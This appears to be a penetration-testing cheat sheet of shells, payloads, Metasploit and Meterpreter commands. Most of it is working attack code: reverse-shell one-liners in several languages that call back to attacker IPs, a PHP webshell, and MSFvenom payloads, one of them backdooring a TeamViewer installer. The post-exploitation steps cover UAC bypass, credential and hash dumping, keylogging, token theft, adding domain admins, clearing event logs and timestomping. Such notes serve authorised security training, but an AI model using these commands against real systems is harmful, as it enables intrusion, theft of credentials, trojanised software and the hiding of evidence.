Shells, Payloads & Exploit
Shells and Payloads
# Netcat Bind Shell (requires a netcat build that supports -e, e.g. netcat-traditional; the OpenBSD nc does not)
nc -nlvp 4444 -e cmd.exe
nc -nv 10.11.0.22 4444
# Netcat Reverse Shell
rlwrap nc -nlvp 4444
nc -nv 10.11.0.22 4444 -e /bin/bash
# Different commands used to get reverse shell : https://www.revshells.com
Bash : bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
SH : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
Python : python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP : php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
PERL : perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Netcat : nc -e /bin/sh 10.0.0.1 1234
Netcat : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Ruby : ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Powershell : powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Java :
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
# Start a bind shell on the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
# Different commands used to spawn an interactive shell on a linux-based system
Python : python -c 'import pty; pty.spawn("/bin/sh")'
Sh : /bin/sh -i
Perl : perl -e 'exec "/bin/sh";'
Ruby : ruby: exec "/bin/sh"
Lua : Lua: os.execute('/bin/sh')
awk : awk 'BEGIN {system("/bin/sh")}'
find : find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find : find . -exec /bin/sh \; -quit
vim : vim -c ':!/bin/sh'
# Upgrade shell TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo;fg
<enter><enter>
reset
xterm
# Socat Reverse Shells
socat -d -d TCP4-LISTEN:443 STDOUT
socat TCP4:10.11.0.22:443 EXEC:/bin/bash
# Socat Encrypted Bind Shells (verify=0 disables certificate verification on both ends: the channel is encrypted but neither peer is authenticated)
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat - OPENSSL:10.11.0.4:443,verify=0
# Powercat Reverse Shells
sudo nc -lvp 443
powercat -c 10.11.0.4 -p 443 -e cmd.exe
# Powercat Bind Shells
powercat -l -p 443 -e cmd.exe
nc 10.11.0.22 443
# Powercat Stand-Alone Payloads
powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
./reverseshell.ps1
# Creating a stand-alone encoded Base64 payload
powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
powershell.exe -E "Base64 encoded payload"
# MSFvenom command used to generate a linux-based reverse shell stageless payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf
# MSFvenom command used to generate a Windows-based reverse shell stageless payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > rev.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe -o rev.exe
# MSFvenom command used to generate a MacOS-based reverse shell payload
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho
# MSFvenom command used to generate an ASP web reverse shell payload
msfvenom -p windows/<meterpreter>/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp
# MSFvenom command used to generate a JSP web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp
# MSFvenom command used to generate a WAR java/jsp compatible web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war
# Create a webshell php file
echo "<?php system(\$_GET["cmd"]);?>" > /var/www/html/shell.php
# Location of laudanum webshells on ParrotOS and Pwnbox
/usr/share/webshells/laudanum
# Location of Antak-Webshell on Parrot OS and Pwnbox
/usr/share/nishang/Antak-WebShell
Public Exploits
# Online
https://www.exploit-db.com
https://packetstorm.news
https://github.com
# Offline
Metasploit
searchsploit
/usr/share/nmap/scripts/
# Search for public exploits for a web application
searchsploit openssh 7.2
# MSF: Search for public exploits in MSF
search exploit eternalblue
# MSF: Start using an MSF module
use exploit/windows/smb/ms17_010_psexec
# MSF: Show required options for an MSF module
show options
# MSF: Set a value for an MSF module option
set RHOSTS 10.10.10.40
# MSF: Test if the target server is vulnerable
check
# MSF: Run the exploit against the target server
exploit
Cross-Compiling Exploit Code
# Compiling exploit for windows target
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
# run exploit with wine in linux
sudo wine syncbreeze_exploit.exe
# Packing chisel with upx
upx brute chisel
# Convert Python exploit to a binary file
pyinstaller.exe --onefile .\41090.py
Metasploit Framework
# Create and initialize the database
sudo msfdb init
# Enable PostgreSQL
sudo systemctl enable postgresql
# Confirming the database connection
msf6 > db_status
MSFVenom
# Generating Payload
msfvenom -p windows/<meterpreter>/reverse_tcp LHOST=<IP> LPORT=1337 -f aspx > reverse_shell.aspx
msfvenom -p linux/x64/<meterpreter>/reverse_tcp LHOST=<IP> LPORT=8080 -f elf -o backupjob
# Generating Payload - With Encoding
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
# starting a listener on msfconsole
msf6 > use multi/handler
# Privilege Escalation
use post/multi/recon/local_exploit_suggester
# Embed payloads into any executable
msfvenom windows/x86/<meterpreter_reverse_tcp> LHOST=<IP> LPORT=8080 -k -x TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o TeamViewer_Setup.exe -i 5
Post-Exploitation
# Display idle time from current user
meterpreter > idletime
# Elevate permissions to NT AUTHORITY\SYSTEM
# Check if we have SeImpersonatePrivilege or SeDebugPrivilege
whoami /priv
# Elevate our privileges with getsystem
meterpreter > getsystem
meterpreter > getuid
# Migrate into explorer.exe
meterpreter > ps
meterpreter > migrate <PID>
# If we don't find a suitable process to migrate to, we can create a new one
meterpreter > execute -H -f notepad
meterpreter > migrate <PID>
# Elevate our shell to a high integrity level by bypassing UAC
# Verifying the integrity level
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
# Bypass UAC
search UAC
use exploit/windows/local/bypassuac_sdclt
# Load Kiwi module and execute creds_msv to retrieve credentials
meterpreter > load kiwi
meterpreter > creds_msv
MSFconsole Commands
Command
Description
show exploits
Show all exploits within the Framework.
show payloads
Show all payloads within the Framework.
show auxiliary
Show all auxiliary modules within the Framework.
search <name>
Search for exploits or modules within the Framework.
info
Load information about a specific exploit or module.
use <name>
Load an exploit or module (example: use windows/smb/psexec).
use <number>
Load an exploit by using the index number displayed after the search command.
LHOST
Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.
RHOST
The remote host or the target.
set <function>
Set a specific value (for example, LHOST or RHOST).
setg <function>
Set a specific value globally (for example, LHOST or RHOST).
show options
Show the options available for a module or exploit.
show targets
Show the platforms supported by the exploit.
set target <number>
Specify a specific target index if you know the OS and service pack.
set payload <payload>
Specify the payload to use.
set payload <number>
Specify the payload index number to use after the show payloads command.
show advanced
Show advanced options.
set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.
check
Determine whether a target is vulnerable to an attack.
exploit
Execute the module or exploit and attack the target.
exploit -j
Run the exploit under the context of the job. (This will run the exploit in the background.)
exploit -z
Do not interact with the session after successful exploitation.
exploit -e <encoder>
Specify the payload encoder to use (example: exploit -e shikata_ga_nai).
exploit -h
Display help for the exploit command.
sessions -l
List available sessions (used when handling multiple shells).
sessions -l -v
List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.
sessions -s <script>
Run a specific Meterpreter script on all Meterpreter live sessions.
sessions -K
Kill all live sessions.
sessions -c <cmd>
Execute a command on all live Meterpreter sessions.
sessions -u <sessionID>
Upgrade a normal Win32 shell to a Meterpreter console.
db_create <name>
Create a database to use with database-driven attacks (example: db_create autopwn).
db_connect <name>
Create and connect to a database for driven attacks (example: db_connect autopwn).
db_nmap
Use Nmap and place results in a database. (Normal Nmap syntax is supported, such as -sT -v -P0.)
db_destroy
Delete the current database.
db_destroy <user:password@host:port/database>
Delete database using advanced options.
Meterpreter Commands
Command
Description
help
Open Meterpreter usage help.
run <scriptname>
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.
sysinfo
Show the system information on the compromised target.
ls
List the files and folders on the target.
use priv
Load the privilege extension for extended Meterpreter libraries.
ps
Show all running processes and which accounts are associated with each process.
migrate <proc. id>
Migrate to the specific process ID (PID is the target process ID gained from the ps command).
use incognito
Load incognito functions. (Used for token stealing and impersonation on a target machine.)
list_tokens -u
List available tokens on the target by user.
list_tokens -g
List available tokens on the target by group.
impersonate_token <DOMAIN_NAME\USERNAME>
Impersonate a token available on the target.
steal_token <proc. id>
Steal the tokens available for a given process and impersonate that token.
lsa_dump_sam
Dumping SAM
lsa_dump_secrets
Dumping LSA secrets
drop_token
Stop impersonating the current token.
getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.
shell
Drop into an interactive shell with all available tokens.
execute -f <cmd.exe> -i
Execute cmd.exe and interact with it.
execute -f <cmd.exe> -i -t
Execute cmd.exe with all available tokens.
execute -f <cmd.exe> -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process.
rev2self
Revert back to the original user you used to compromise the target.
reg <command>
Interact, create, delete, query, set, and much more in the target’s registry.
setdesktop <number>
Switch to a different screen based on who is logged in.
screenshot
Take a screenshot of the target’s screen.
upload <filename>
Upload a file to the target.
download <filename>
Download a file from the target.
keyscan_start
Start sniffing keystrokes on the remote target.
keyscan_dump
Dump the remote keys captured on the target.
keyscan_stop
Stop sniffing keystrokes on the remote target.
getprivs
Get as many privileges as possible on the target.
uictl enable <keyboard/mouse>
Take control of the keyboard and/or mouse.
background
Run your current Meterpreter shell in the background.
hashdump
Dump all hashes on the target.
use sniffer
Load the sniffer module.
sniffer_interfaces
List the available interfaces on the target.
sniffer_dump <interfaceID> pcapname
Start sniffing on the remote target.
sniffer_start <interfaceID> packet-buffer
Start sniffing with a specific range for a packet buffer.
sniffer_stats <interfaceID>
Grab statistical information from the interface you are sniffing.
sniffer_stop <interfaceID>
Stop the sniffer.
add_user <username> <password> -h <ip>
Add a user on the remote target.
add_group_user <"Domain Admins"> <username> -h <ip>
Add a username to the Domain Administrators group on the remote target.
clearev
Clear the event log on the target machine.
timestomp
Change file attributes, such as creation date (antiforensics measure).
reboot
Reboot the target machine.